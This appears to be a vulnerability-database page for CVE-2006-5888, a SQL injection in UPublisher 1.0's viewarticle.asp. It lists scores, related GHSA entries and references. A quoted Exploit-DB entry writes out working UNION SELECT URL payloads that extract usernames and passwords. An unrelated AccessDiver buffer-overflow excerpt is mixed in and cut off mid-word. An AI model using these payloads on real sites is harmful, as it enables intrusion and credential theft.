CVE-2006-5888
Published 2006-11-14
CVE-2006-5888: SQL injection vulnerability in viewarticle.asp in Superfreaker Studios UPublisher 1.0 allows remote attackers to execute arbitrary SQL commands via the ID…
Priority P337 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 1.12% · 62.1th percentile
SQL injection vulnerability in viewarticle.asp in Superfreaker Studios UPublisher 1.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| superfreaker_studios | upublisher | — | — |
GHSA
GHSA-pjg8-mhcc-g856: Multiple SQL injection vulnerabilities in Superfreaker Studios UPublisher 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6398 [HIGH] GHSA-pjg8-mhcc-g856: Multiple SQL injection vulnerabilities in Superfreaker Studios UPublisher 1
Multiple SQL injection vulnerabilities in Superfreaker Studios UPublisher 1.0 allow remote attackers to execute arbitrary SQL commands via unspecified vectors in (a) sendarticle.asp and (b) printarticle.asp, and the ID parameter to (c) index.asp and (d) preferences.asp, different vectors than CVE-2006-5888.
GHSA
GHSA-ghjf-62x3-p3rw: SQL injection vulnerability in viewarticle
ghsa_unreviewed·2022-05-01
CVE-2006-5888 [HIGH] GHSA-ghjf-62x3-p3rw: SQL injection vulnerability in viewarticle
SQL injection vulnerability in viewarticle.asp in Superfreaker Studios UPublisher 1.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter.
No detection rules found.
Exploit-DB
AccessDiver 4.301 - Buffer Overflow
exploitdb·2015-12-26
---
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt
Vendor:
M. Jean Fages
www.accessdiver.com
circa 1998-2006
Product:
AccessDiver V4.301 build 5888
AccessDiver is a security tester for Web pages. It has got a set of tools which will verify the robustness of your accounts and directories. You will know if your customers, your users and you can use safely your web site.
Vulnerability Type:
Buffer Overflow
CVE Reference:
N/A
Vulnerability Details:
AccessDiver is vulnerable to multiple buffer overflows, two vectors are described below.
1) buffer overflow @ 2073 bytes in URL field for Server / IP address and will overwrite NSEH and SEH excepti
Exploit-DB
UPublisher 1.0 - 'viewarticle.asp' SQL Injection
exploitdb·2006-11-12
CVE-2006-5888 UPublisher 1.0 - 'viewarticle.asp' SQL Injection
---
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Dork : UPublisher
# Vendor: http://www.superfreaker.com/
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example:
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
No writeups or analysis indexed.
http://secunia.com/advisories/22840
http://www.securityfocus.com/archive/1/451372/100/0/threaded
http://www.vupen.com/english/advisories/2006/4463
https://exchange.xforce.ibmcloud.com/vulnerabilities/30190
https://www.exploit-db.com/exploits/2765
Published: 2006-11-14